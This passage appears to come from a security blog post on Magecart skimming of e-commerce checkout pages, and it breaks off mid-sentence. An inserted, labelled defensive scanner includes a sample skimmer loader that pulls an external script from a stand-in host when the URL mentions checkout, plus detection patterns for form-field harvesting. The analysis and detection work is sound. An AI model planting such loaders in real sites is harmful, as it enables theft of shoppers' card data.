Trustwave SpiderLabs first blogged about Magecart back in 2019; fast forward five years and it is still here, going strong.
During the pre-holiday season, cybercriminals ramped up their efforts to target e-commerce websites, aiming to steal cardholder and personal information. These attacks, collectively known as Magecart, have been active since 2015, named after the Magento e-commerce platform with "cart" referencing shopping carts — their initial primary targets.
Magecart attacks have persisted due to the widespread use of the Magento platform, which powers numerous online stores worldwide. The pandemic further fuelled the group's activity, as the global shift to online shopping presented an expanded attack surface. In this blog, we will discuss what we have recently seen, explore the attack methodology, and the current state of Magecart threats.
Magecart attacks typically follow a structured approach:

Figure 1. A typical Magecart attack flow
Attackers often gain unauthorized access to a website by exploiting vulnerabilities in the e-commerce platform, its infrastructure, or compromised third-party services. They may exploit unpatched vulnerabilities in Magento websites, but it is also common for them to target third-party vendors with weaker security. Other methods include brute-forcing admin credentials or taking advantage of misconfigurations in the website or its supporting systems.
Threat actors have exploited several known vulnerabilities (CVEs) in e-commerce platforms, with Magento being a frequent target. Below is a notable Magento vulnerability that was exploited in 2024:
According to Sansec, e-commerce stores were being hacked at the alarming rate of five to 30 sites per hour during this campaign.

Figure 2. A snippet of the skimmer's data exfiltration code injected into Cisco’s e-commerce website in September 2024; the site is believed to have been compromised using the CosmicSting vulnerability.
Skimmer code is injected by attackers depending on the opportunities and services available to them. They may insert the code directly into checkout pages or spread it across multiple pages of the website, with a primary focus on monitoring checkout pages. The code typically identifies these pages by checking whether the URL path contains keywords such as "checkout" or "onepage". Once the target page is detected, the skimmer captures user input on payment forms, including sensitive data such as credit card numbers, CVVs, and billing details.

Figure 3. Malicious JavaScript injected to load an external script whenever the page location (href) contains the string “checkout” or “onepage.” Once triggered, the external script monitors the input fields on the page, enabling card skimming and the exfiltration of sensitive data.
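To show how a defender can look for the loader pattern described above, here is an added example (not code from the original post or from Trustwave): a small static scanner that pulls inline scripts out of an HTML page and flags any that gate on "checkout"/"onepage" in the page location and then load an external script, read form fields, or reference a host outside an allowlist. The HTML sample and the hostnames in it are constructed for the example.

```javascript
// Constructed sample page: one benign analytics tag, one Figure-3-style loader.
const SAMPLE_HTML = `
<html><body>
<script>
  // benign: only reads the path to tag the checkout step
  if (location.pathname.indexOf("checkout") !== -1) { window.dataLayer.push({step: "checkout"}); }
</script>
<script>
  if (window.location.href.indexOf("checkout") > -1 || window.location.href.indexOf("onepage") > -1) {
    var s = document.createElement("script");
    s.src = "https://cdn-static-example.invalid/jquery.min.js";
    document.head.appendChild(s);
  }
</script>
</body></html>`;

// Page-gating: a location/URL read followed closely by a checkout keyword.
const PAGE_CHECK = /(location\.(href|pathname)|document\.URL)[\s\S]{0,80}(checkout|onepage)/i;
// Dynamic loader: creating a <script> element or assigning an absolute URL to .src.
const LOADER = /createElement\s*\(\s*["']script["']\s*\)|\.src\s*=\s*["']https?:\/\//i;
// Form harvesting: enumerating <input> elements or reading their values.
const FIELD_READ = /(querySelectorAll|getElementsByTagName)\s*\(\s*["']input["']\s*\)|\.value\b/i;

// Return the body of every inline <script> block (blocks with a src= are skipped).
function inlineScripts(html) {
  const out = [];
  const re = /<script\b(?![^>]*\bsrc=)[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Hostnames referenced through http(s) URLs inside a script body.
function externalHosts(src) {
  return [...src.matchAll(/https?:\/\/([^/"'\s]+)/gi)].map(m => m[1].toLowerCase());
}

// Gating on the checkout page alone is normal; gating plus a loader, field reads,
// or an unlisted host is the combination worth a closer look.
function scanScript(src, allowedHosts) {
  const gated = PAGE_CHECK.test(src);
  const loads = LOADER.test(src);
  const reads = FIELD_READ.test(src);
  const unknownHosts = externalHosts(src).filter(h => !allowedHosts.includes(h));
  const suspicious = gated && (loads || reads || unknownHosts.length > 0);
  return { gated, loads, reads, unknownHosts, suspicious };
}

function scanHtml(html, allowedHosts = []) {
  return inlineScripts(html).map((src, i) => ({ index: i, ...scanScript(src, allowedHosts) }));
}

for (const r of scanHtml(SAMPLE_HTML, ["www.google-analytics.com"])) console.log(r);
```

The allowlist is the set of script hosts the site legitimately uses; anything else that appears only inside a checkout-gated block is the signal, and the same checks can be run over a crawled copy of each page on a schedule to catch newly injected loaders.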
At the height of the pandemic in 2020, attackers were observed injecting malicious code into a compromised e-commerce site’s Magento global configuration, causing the code to load on every page each time a user accesses the website. Figure 4 illustrates Magento’s design configuration page, where administrators can customize the footer section of the webpage. This section is typically used to define the copyright notice, but it also allows for the insertion of a